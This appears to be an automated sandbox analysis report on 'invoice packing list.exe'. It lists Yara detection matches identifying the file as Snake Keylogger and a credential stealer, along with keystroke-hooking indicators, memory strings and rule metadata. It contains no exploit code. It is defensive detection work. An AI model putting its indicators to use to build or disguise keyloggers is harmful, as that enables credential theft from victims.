
          barindex
          Contains functionality to log keystrokes (.Net Source)
          Source: invoice packing list.exe, HookManager.cs.Net Code: EnsureSubscribedToGlobalKeyboardEvents

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 0.2.invoice packing list.exe.3888088.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0.2.invoice packing list.exe.3888088.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.invoice packing list.exe.3888088.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.invoice packing list.exe.3888088.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 00000005.00000002.4488887309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000005.00000002.4488887309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 00000000.00000002.2043114351.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000000.00000002.2043114351.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: Process Memory Space: invoice packing list.exe PID: 3008, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: invoice packing list.exe PID: 3008, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: Process Memory Space: invoice packing list.exe PID: 3716, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: invoice packing list.exe PID: 3716, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: invoice packing list.exe
          Source: C:\Users\user\Desktop\invoice packing list.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_02703E0C0_2_02703E0C
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_027073900_2_02707390
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_04E271B80_2_04E271B8
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_04E273880_2_04E27388
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_04E284C70_2_04E284C7
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_04E200400_2_04E20040
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_04E2E1270_2_04E2E127
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_04E2E1380_2_04E2E138
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_04E209F00_2_04E209F0
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_04E20A000_2_04E20A00
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 0_2_04E273790_2_04E27379
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_014861085_2_01486108
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_0148C1905_2_0148C190
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_0148F0075_2_0148F007
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_0148B3285_2_0148B328
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_0148C4705_2_0148C470
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_0148C7515_2_0148C751
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_014867305_2_01486730
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_014898585_2_01489858
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_0148BBD25_2_0148BBD2
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_0148CA315_2_0148CA31
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_01484AD95_2_01484AD9
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_0148BEB05_2_0148BEB0
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_014835705_2_01483570
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_0148E5175_2_0148E517
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_0148E5285_2_0148E528
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_0148B4F25_2_0148B4F2
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC7EF65_2_06BC7EF6
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BCBE005_2_06BCBE00
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC9E785_2_06BC9E78
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BCB7B05_2_06BCB7B0
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BCA4C05_2_06BCA4C0
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BCC4485_2_06BCC448
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BCDD3A5_2_06BCDD3A
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BCAB105_2_06BCAB10
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC98305_2_06BC9830
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC11A05_2_06BC11A0
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC91E05_2_06BC91E0
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC79105_2_06BC7910
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BCB1605_2_06BCB160
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC36005_2_06BC3600
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC9E675_2_06BC9E67
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC67B05_2_06BC67B0
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC67A05_2_06BC67A0
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BCB7A05_2_06BCB7A0
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC47E85_2_06BC47E8
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC47DA5_2_06BC47DA
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC7F585_2_06BC7F58
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC74B85_2_06BC74B8
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BCA4B05_2_06BCA4B0
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC74A85_2_06BC74A8
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC04985_2_06BC0498
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC04885_2_06BC0488
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC54F05_2_06BC54F0
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC54E25_2_06BC54E2
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BCC4385_2_06BCC438
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC4C305_2_06BC4C30
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC6C085_2_06BC6C08
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC4C405_2_06BC4C40
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC5DA05_2_06BC5DA0
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC5D925_2_06BC5D92
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BCBDF35_2_06BCBDF3
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC0D395_2_06BC0D39
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC0D485_2_06BC0D48
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC62205_2_06BC6220
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC62105_2_06BC6210
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC6BF85_2_06BC6BF8
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BCAB025_2_06BCAB02
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC43685_2_06BC4368
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC43585_2_06BC4358
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC50985_2_06BC5098
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC508A5_2_06BC508A
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC08F05_2_06BC08F0
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC08E05_2_06BC08E0
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC98205_2_06BC9820
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC00065_2_06BC0006
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC70605_2_06BC7060
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC70545_2_06BC7054
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC00405_2_06BC0040
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC11915_2_06BC1191
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC91D05_2_06BC91D0
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC29005_2_06BC2900
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC79005_2_06BC7900
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BCB1505_2_06BCB150
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 5_2_06BC59485_2_06BC5948
          Source: invoice packing list.exe, 00000000.00000002.2039047487.0000000000A6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs invoice packing list.exe
          Source: invoice packing list.exe, 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs invoice packing list.exe
          Source: invoice packing list.exe, 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs invoice packing list.exe
          Source: invoice packing list.exe, 00000000.00000002.2049167889.00000000052E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs invoice packing list.exe
          Source: invoice packing list.exe, 00000000.00000002.2039673818.0000000002620000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs invoice packing list.exe
          Source: invoice packing list.exe, 00000000.00000002.2043114351.00000000040BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs invoice packing list.exe
          Source: invoice packing list.exe, 00000000.00000002.2043114351.00000000040BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs invoice packing list.exe
          Source: invoice packing list.exe, 00000000.00000000.2027180144.0000000000422000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIhJW.exeF vs invoice packing list.exe
          Source: invoice packing list.exe, 00000000.00000002.2040181674.00000000028B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs invoice packing list.exe
          Source: invoice packing list.exe, 00000005.00000002.4488887309.0000000000422000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs invoice packing list.exe
          Source: invoice packing list.exe, 00000005.00000002.4489030628.0000000000DA7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs invoice packing list.exe
          Source: invoice packing list.exeBinary or memory string: OriginalFilenameIhJW.exeF vs invoice packing list.exe
          Source: invoice packing list.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 0.2.invoice packing list.exe.3888088.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0.2.invoice packing list.exe.3888088.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.invoice packing list.exe.3888088.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0.2.invoice packing list.exe.3888088.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 00000005.00000002.4488887309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000005.00000002.4488887309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 00000000.00000002.2043114351.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000000.00000002.2043114351.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: Process Memory Space: invoice packing list.exe PID: 3008, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: invoice packing list.exe PID: 3008, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: Process Memory Space: invoice packing list.exe PID: 3716, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: invoice packing list.exe PID: 3716, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
